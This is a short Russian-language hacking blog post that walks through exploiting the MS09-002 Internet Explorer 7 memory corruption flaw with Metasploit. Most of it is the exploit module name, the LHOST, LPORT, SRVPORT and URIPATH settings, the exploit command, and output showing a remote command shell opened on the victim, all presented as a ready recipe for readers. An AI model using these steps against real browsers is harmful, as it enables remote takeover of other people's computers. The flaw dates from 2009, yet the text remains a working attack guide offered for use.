Сегодня я расскажу об использовании уязвимости в Internet Explorer. Уязвимость эта более чем актуальная,т.к. бюллетень был опубликован лишь в середине февраля 2009.
Как видно из названия статьи, для работы нам потребуется Metasploit Framework 3.3 с последними обновлениями.Итак, открываем консоль метасплойта и командуем show

use exploit/windows/browser/ms09_002_memory_corruption



set LHOST 0.0.0.0 - ваш ip
set LPORT 1234 - порт для сплойта, можете писать любой
set SRVPORT 80 - порт для браузера,в принципе параметр можно не задавать,тогда порт в ссылке будет 8080
set URIPATH .....html - название страницы в сылке,необязательный параметр
Вот и всё.Командуем exploit!!!


Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to
0.0.0.0:64239...[*] Command shell session 3 opened
(0.0.0.0:1234 -> 0.0.0.0:64240
...открываем активную сессию
sessions -i 3
(...а тем временем BLC пытается закрыть повисший IE, но у него это не получается, закрывает только через диспечер задач



Осталось объяснить как открыть консоль метасплойта

EbriPsy co stopxaker.ru
Aucun commentaire:
Enregistrer un commentaire